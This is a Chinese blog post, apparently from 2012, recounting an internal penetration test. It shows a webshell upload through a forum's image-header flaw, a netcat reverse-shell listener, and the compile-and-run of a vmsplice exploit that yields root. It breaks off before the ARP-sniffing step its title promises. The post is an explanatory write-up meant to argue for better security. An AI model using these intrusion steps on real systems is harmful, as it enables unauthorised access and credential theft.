一次Linux下ARP欺骗嗅探公司邮箱密码的内部渗透测试.pdfVIP

一次Linux下ARP欺骗嗅探公司邮箱密码的内部渗透测试 | bugcxs blog | 关注网络安全 Author:bugcx or Anonymous Url: http://blog.bug.cx/2012/04/25/%e4%b8%80%e6%ac%a1linux%e4%b8%8barp%e6%ac%ba%e9%aa%97%e5%97%85% (撸一撸)| bugcxs blog | 关注网络安全 by：vitter@ blog： 早就跟相关人员说过 邮箱认证smtp和pop协议要做加密，否则在公司内网，太容易被人sniffer到明文密码了，另外邮箱密码和bbs 公用，bbs 也 是采用的http 协 议，没有用https ，这些都是问题。虽然我们控制的网络部分已经做过处理了，ip和mac地址做了绑定，即使有人做arp欺骗 后，除非不出网关，否则欺 骗后网络到达不了网关之外，因此嗅探明文邮箱密码已经不可能（由于邮箱服务器不在同一网段）。但是对于我 们一些共用资源的服务器有公网ip和内网ip且处 于一个相对风险较高，而且没有根据安全级别进行过相应的安全策略的网络环境内，因此一 些问题是显而易见的，但是某些人根本不以为然。所以我进行了一次简单 的内部渗透测试。 首先我从有公网ip和内网ip 的网络段入手，如公网ip段是/55 ，内网ip段/ 。 经过踩点发现7 （7 ）上跑了一个老版本的某php 的论坛。经过检测，存在上传漏洞，利用gif89a文件头欺骗漏洞上 传webshell 。然后上传个nst 。 如图 1： 利用tools里面的反弹连接： 首先在本地用nc -l -p 5546监听端口 如图4 ： http://blog.bug.cx/2012/04/25/一次linux下arp欺骗嗅探公司邮箱密码的内部渗透测试/ [2012/5/3 12:47:15] 一次Linux下ARP欺骗嗅探公司邮箱密码的内部渗透测试 | bugcxs blog | 关注网络安全 然后在nst上点Back connect 如图2 ：（注意红色部分） 成功登陆 如图3 ： http://blog.bug.cx/2012/04/25/一次linux下arp欺骗嗅探公司邮箱密码的内部渗透测试/ [2012/5/3 12:47:15] 一次Linux下ARP欺骗嗅探公司邮箱密码的内部渗透测试 | bugcxs blog | 关注网络安全 图5 ： 在本地nc的窗口操作： id uid=99(nobody) gid=99(nobody) groups=99(nobody) 权限低了点，可以利用前一段时间linux内核vmsplice本地提升权限漏洞。先用nst上传代码： 如图6 ：（注意红色部分，上传成功） http://blog.bug.cx/2012/04/25/一次linux下arp欺骗嗅探公司邮箱密码的内部渗透测试/ [2012/5/3 12:47:15] 一次Linux下ARP欺骗嗅探公司邮箱密码的内部渗透测试 | bugcxs blog | 关注网络安全 回到nc窗口： cp in.c /tmp cd /tmp ls in.c nst_c_bc_c.c sess_af927ee319af5d5569b61ac520e53fcf ssh-ZeOfP16753 tunl0 gcc -o in in.c ls in in.c nst_c_bc_c.c sess_af927ee319af5d5569b61ac520e53fcf ssh-ZeOfP16753 tunl0 /tmp/in bash: no job control in this shell [root@bbs111 tmp]# id uid=0(root) gid=0(root) groups=99(nobody) [root@bbs111